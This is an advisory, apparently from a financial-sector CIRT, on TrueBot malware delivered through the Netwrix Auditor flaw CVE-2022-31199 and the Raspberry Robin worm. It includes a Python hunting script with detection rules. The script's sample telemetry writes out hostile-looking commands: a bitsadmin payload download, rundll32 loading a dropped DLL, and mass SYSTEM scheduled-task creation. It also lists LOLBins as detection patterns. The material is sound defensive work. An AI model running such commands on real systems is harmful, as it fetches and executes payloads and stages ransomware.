TrueBot Malware 11 December 2022

The Silence APT group has been targeting financial institutions in several countries by delivering TrueBot malware, using a critical remote code execution (RCE) bug in Netwrix Auditor and the Raspberry Robin worm as delivery vectors.

TrueBot was first identified in 2017 as downloader malware. Its main goal is to infect systems, collect information that helps the operators triage interesting targets, and deploy additional payloads.

Security researchers have observed an increase in TrueBot infections and have linked them to the threat actors known as Silence APT and TA505. These actors' operations have moved from malicious emails to alternative delivery methods, namely exploitation of a remote code execution flaw (CVE-2022-31199) in Netwrix Auditor and the Raspberry Robin worm.

Tactics and Techniques:

  • On Netwrix Auditor servers, suspicious commands were executed by the process UAVRServer.exe, which in turn launched bitsadmin.exe to download and execute the TrueBot payload.
  • Security researchers also observed a growing number of systems infected with the Raspberry Robin worm via infected USB drives; the worm then delivered TrueBot by downloading a Truebot.dll file and executing it with rundll32.exe.
  • TrueBot deploys additional payloads such as Cobalt Strike and the Grace malware to collect information and send it to the attackers' command and control (C2) server.
  • TrueBot also delivered Teleport, a custom data exfiltration tool written in C++ with several features that make exfiltration easier and stealthier.
  • Once sufficient data had been collected, the attackers created scheduled tasks on a large number of systems to start the Clop ransomware simultaneously and encrypt the highest possible volume of data.
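
The chain above (Netwrix Auditor service spawning bitsadmin.exe, rundll32.exe loading a DLL from a user-writable path, scheduled tasks created across many hosts at once) can be hunted for in process-creation telemetry. The following is an added example written for this advisory, not code from EG-FinCIRT or any vendor. It assumes Sysmon Event ID 1-style fields (host, time, parent image, image, command line); the sample events, install path, IP address, file names and task name in it are constructed placeholders, not indicators from the report.

```python
"""Hunt for the TrueBot delivery chain in Windows process-creation telemetry.

Added example, not from the advisory. Field names follow Sysmon Event ID 1;
every value in SAMPLE_EVENTS is constructed and is not a real indicator.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample telemetry (placeholder hosts, paths, IPs and task names).
SAMPLE_EVENTS = [
    # Netwrix Auditor service process spawning a download-capable LOLBin (bullet 1)
    {"host": "NETWRIX01", "time": "2022-12-01T09:15:02",
     "parent": r"C:\Program Files\Netwrix Auditor\UAVRServer.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j1 /download /priority high http://203.0.113.5/a.dll C:\Users\Public\a.dll"},
    # rundll32 executing a DLL dropped in a user-writable directory (bullet 2)
    {"host": "WS-0117", "time": "2022-12-01T09:20:41",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\Truebot.dll,Entry"},
    # Benign rundll32 loading a system DLL: must not alert
    {"host": "WS-0118", "time": "2022-12-01T09:21:00",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    # The same task created on three hosts within seconds (bullet 5, pre-encryption staging)
    {"host": "WS-0201", "time": "2022-12-03T02:00:05", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "SystemSync" /tr C:\ProgramData\sys.exe /sc once /st 02:30 /ru SYSTEM /f'},
    {"host": "WS-0202", "time": "2022-12-03T02:00:09", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "SystemSync" /tr C:\ProgramData\sys.exe /sc once /st 02:30 /ru SYSTEM /f'},
    {"host": "WS-0203", "time": "2022-12-03T02:00:12", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "SystemSync" /tr C:\ProgramData\sys.exe /sc once /st 02:30 /ru SYSTEM /f'},
    # A single admin creating a task days earlier: normal activity, must not alert
    {"host": "ADMIN01", "time": "2022-11-28T14:12:00", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Backup" /tr C:\Scripts\backup.cmd /sc daily /st 23:00'},
]

# LOLBins that can fetch or launch a payload; a backend audit service has no reason to spawn them.
LOLBINS = {"bitsadmin.exe", "certutil.exe", "powershell.exe", "cmd.exe", "curl.exe", "mshta.exe"}
# Directories an unprivileged user (or a USB-borne worm) can write to.
USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt_netwrix_lolbin(events):
    """Rule 1: UAVRServer.exe (Netwrix Auditor) spawning a download-capable LOLBin."""
    return [e for e in events
            if basename(e["parent"]) == "uavrserver.exe" and basename(e["image"]) in LOLBINS]


def hunt_rundll32_user_path(events):
    """Rule 2: rundll32.exe executing a DLL that lives in a user-writable directory."""
    hits = []
    for e in events:
        if basename(e["image"]) != "rundll32.exe":
            continue
        m = re.search(r'[a-z]:\\[^,"\s]+\.dll', e["cmdline"], re.I)
        if m and USER_WRITABLE.search(m.group(0)):
            hits.append(e)
    return hits


def hunt_mass_schtasks(events, min_hosts=3, window=timedelta(minutes=10)):
    """Rule 3: the same scheduled task created on >= min_hosts hosts inside one time window.

    One host creating a task is routine administration; a fleet-wide burst of the
    same task name is the staging step the advisory describes before Clop runs.
    """
    by_task = defaultdict(list)
    for e in events:
        if basename(e["image"]) != "schtasks.exe" or "/create" not in e["cmdline"].lower():
            continue
        m = re.search(r'/tn\s+"?([^"\s]+)', e["cmdline"], re.I)
        name = m.group(1).lower() if m else "<unnamed>"
        by_task[name].append((datetime.fromisoformat(e["time"]), e["host"]))
    alerts = []
    for name, items in by_task.items():
        items.sort()
        for i, (t0, _) in enumerate(items):          # slide the window over each start time
            hosts = {h for t, h in items[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"task": name, "hosts": sorted(hosts), "start": t0.isoformat()})
                break
    return alerts


def run_hunts(events):
    """Run all three rules and return the hits keyed by rule name."""
    return {"netwrix_lolbin": hunt_netwrix_lolbin(events),
            "rundll32_user_path": hunt_rundll32_user_path(events),
            "mass_schtasks": hunt_mass_schtasks(events)}


if __name__ == "__main__":
    for rule, hits in run_hunts(SAMPLE_EVENTS).items():
        print(f"{rule}: {len(hits)} hit(s)")
        for h in hits:
            print("   ", h)
```

Rule 1 is the highest-fidelity of the three, because the Netwrix service process should never have a child process that downloads files; rule 2 will also catch other loaders that drop DLLs under user profiles, so tune USER_WRITABLE to your environment; rule 3 needs the events of the whole fleet in one place (SIEM or EDR export), since a single host's log cannot show the burst.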
Indicators of Compromise

Indicators of compromise will be shared with EG-FinCIRT’s Constituents

Vulnerabilities
  • CVE-2022-31199
Mitigations
  • Search for existing signs of the indicated IOCs in your environment.
  • Block IOCs at the organization’s security devices.
  • Enable machine learning, active adversary mitigations, and behavioral detection in endpoint security.
  • Develop and implement a patching policy and baseline configuration standards for the operating system.
  • Conduct cybersecurity awareness training for end users.
  • Ensure anti-virus software and associated files are up to date.
  • Implement application whitelisting, which only allows systems to execute programs known and permitted by the organization’s security policy.
  • Update Netwrix Auditor to version 10.5 to fix the mentioned vulnerability.
  • Back up your data to different backup destinations, including offline media such as tape drives.
